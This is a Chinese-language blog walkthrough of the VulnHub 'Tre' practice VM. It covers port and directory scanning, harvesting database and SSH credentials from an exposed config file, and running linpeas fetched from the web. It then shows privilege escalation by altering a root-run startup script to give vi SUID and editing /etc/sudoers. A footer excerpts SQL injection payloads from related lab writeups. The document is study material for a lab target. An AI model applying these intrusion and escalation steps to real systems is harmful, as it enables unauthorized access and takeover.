Tre靶场通关过程(linpeas使用+启动项编辑器提权)

这篇具有很好参考价值的文章主要介绍了Tre靶场通关过程(linpeas使用+启动项编辑器提权)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Tre靶场通关

通过信息收集获得到了普通用户账号密码,利用PEASS-ng的linpeas脚本进行提权的信息收集,根据已有信息进行提权。

靶机下载地址:

https://download.vulnhub.com/tre/Tre.zip

信息收集

靶机IP探测:192.168.0.129

arp-scan -l

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

端口扫描

nmap -p 1-65535 -sV -A 192.168.0.129
22
80
8082

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

目录扫描

python dirsearch.py -u "http://192.168.0.129"

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

info.php

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

adminer.php

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

dirsearch默认字典没扫除其他有用信息,看别人通关原来是字典的原因,利用dirb大字典扫描目录

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

dirb扫描文件用以下命令

dirb http://192.168.0.129 /usr/share/wordlists/dirb/big.txt -X .php

在扫描的

http://192.168.0.129/mantisbt/config/ 目录下的a.txt文件发现数据库的信息

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

# --- Database Configuration ---
$g_hostname      = 'localhost';
$g_db_username   = 'mantissuser';
$g_db_password   = 'password@123AS';
$g_database_name = 'mantis';
$g_db_type       = 'mysqli';

在adminer.php页面进行登录

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

找到了用户密码信息

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

其中Tre用户可以直接ssh登录

usr:tre
pwd:Tr3@123456A!

ssh tre@192.168.0.129

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

提权阶段

接下来对tre用户进行提权

主要学习下LinPEAS这个提权脚本(Linux/Unix/MacOS),同PEASS-ng里还有Windows的提权脚本WinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh

LinPEAS是一个没有任何依赖的脚本,它使用/bin/sh语法,用于搜索在 Linux/Unix*/MacOS 主机上搜索可能的权限提升路径。默认情况下,LinPEAS 不会向磁盘写入任何内容,也不会尝试以任何其他用户身份使用 su 。

该脚本工具枚举并搜索主机内部可能的错误配置(已知漏洞、用户、进程和文件权限、特殊文件权限、可读/可写文件、暴力破解其他用户(top1000pwds)、密码…),并用颜色突出显示可能的错误配置。

给执行权限,看一下命令参数

chmod 777 linpeas.sh
./linpeas.sh -h

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

开启http服务将脚本传到靶机

python -m http.server 80

靶机执行

wget http://192.168.0.130/linpeas.sh

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

给权限运行脚本,由于内容比较多输出到一个文件中方便查看

./linpeas.sh > 1.txt

在kali攻击机中将生成的文件拷贝出来

rsync -avz tre@192.168.0.129:/home/tre/1.txt /root/linpeas.txt

-a:保持原属性
-v:详细信息
-z:在传输文件时压缩减少网络带宽占用

对生成的报告文件进行分析

more linpeas.txt

内嵌了linux-exploit-suggester,可以根据扫描出的内核漏洞进行提权

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

发现存在一条/bin/bash /usr/bin/check-system的进程,是root用户启动的
Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

查看check-system脚本

cat /usr/bin/check-system

在脚本中发现该脚本的作用是输出Service started at+当前日期,重定向到系统日志等级为info,之后跟了一段死循环一直Checking…让我们发现这个进程用的

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

不难判断这个一定是开机自启动项,验证一下

ls /etc/systemd/system
cat /etc/systemd/system/check-system.service

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

或者直接

systemctl list-unit-files | grep enable

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

提权思路有了:更改这个脚本给vi编辑器s权限,让服务器重启生效,通过vi修改/etc/passwd

有两个问题需要判断:

1.脚本是否有写权限(有)

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

2.服务器如何重启

发现tre用户有shutdown的sudo权限

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

利用命令重启

sudo shutdown -r now

发现条件都具备了,修改脚本

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

进行重启,重新连接,之后vi编辑器就具备了sudo权限,可以横着走了

想改/etc/passwd加一条用户

tpa:123456:0:0:tpa:/root:/bin/bash

但不知道为什么利用用户tpa和密码123456登录不上去

尝试其他方法,想到修改sudo权限,给tre用户增加全部命令的sudo权限

vi /etc/sudoers

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux

直接利用sudo反弹到root,拿到flag

sudo /bin/bash

Tre靶场通关过程(linpeas使用+启动项编辑器提权),从入门到入狱,web安全,网络安全,php,服务器,linux文章来源地址https://www.toymoban.com/news/detail-734691.html

到了这里,关于Tre靶场通关过程(linpeas使用+启动项编辑器提权)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • dvwa靶场通关(七)

    我们输入 1\\\',出现报错信息,根据报错信息可知,查询语句是单引号闭合的字符型  接着判断字段数 1\\\' order by 3#  报错 1\\\' order by 2# 正常  所以字段数就是2 利用联合查询爆出数据库名和版本  输入 -1\\\' union select database(),version()#  爆出表名 -1\\\'union select 1,group_concat(table_name) from i

    2024年02月10日
    浏览(38)
  • DVWA靶场通关实战

    截至2022.11.24,DVWA共有十四个模块,分别是: 按我的思路就是,Low、Media、High是拿来攻击的,Impossible是来教你防御的 然后就是缩减了一下目录,本来攻击方式、源码审计、漏洞原理都加了标题,但是那样目录就太长太丑了,想想还是删了算了 直接开冲! 暴力破解,又叫撞库

    2024年02月14日
    浏览(38)
  • Pikachu靶场通关记录(详细)

    Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行

    2024年04月16日
    浏览(43)
  • xss靶场、xss.haozi.me靶场详细通关教程

    该靶场来自xss经典靶场,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。 HTML编码网站 : Html实体编码解码 (config.net.cn) img 标签的可扩展

    2024年02月07日
    浏览(40)
  • Webug4.0靶场通关

    首先整体浏览网站 注入点: control/sqlinject/manifest_error.php?id=1 判断注入类型 输入: and 1=1 正常, 再输入: and 1=2 还正常, 排除数字型 输入单引号: ’ 网页发生变化 输入’ – q注释掉单引号,页面回显正常 则为字符型 判断字段数 构造payload: ’ order by 3-- q 页面回显错误,而order

    2024年02月12日
    浏览(37)
  • Pikachu靶场—sql注入通关

    创作不易,给个关注吧,有任何问题可以评论或者私聊 关卡详情 根据图上来看,这关有个下拉菜单可以选数字。由于从url看不到什么变化,我们用burpsuite抓包看一下。确定是post请求 因为题目指出是数字型的注入,所以就不用找闭合了,直接使用 order by 探测列数,这里探测

    2024年02月13日
    浏览(46)
  • pikache靶场通关——SSRF攻击

    SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者-----服务

    2024年02月11日
    浏览(36)
  • uploads靶场通关(1-11关)

    看题目我们准备好我们的php脚本文件,命名为1.php 上传该php文件,发现上传失败 方法一:将浏览器的JavaScript禁用 然后就能上传了  方法二: 查看源码,发现只能上传以下形式的文件 我们将刚才的1.php的后缀改为.jpg 上传该文件并用bp抓包,send to Repeater,将其后缀改回1.php,

    2024年02月08日
    浏览(42)
  • DVWA靶场之CSRF通关详解

    CSRF的形成原因主要是由于Web应用程序没有充分验证请求来源的问题。正常的请求必须携带正确的Cookie信息,而攻击者可以构造一个恶意网站,在其中包含一个发送CSRF请求的链接或表单,当用户访问这个网站时,浏览器会自动发送CSRF请求到被攻击的网站,从而实现攻击。 随机

    2024年02月10日
    浏览(34)
  • iwebsec靶场 命令执行漏洞通关笔记

    iwebsec靶场的命令执行通关笔记,共有五个关卡,分别涉及到基础的命令执行漏洞、空格绕过、绕过、通配符绕过、base64绕过共五方面的渗透。 什么是命令执行漏洞?命令执行漏洞是服务器端没有对客户端用户输入的参数进行过滤,导致用户可以通过任意拼接系统命令

    2024年02月10日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包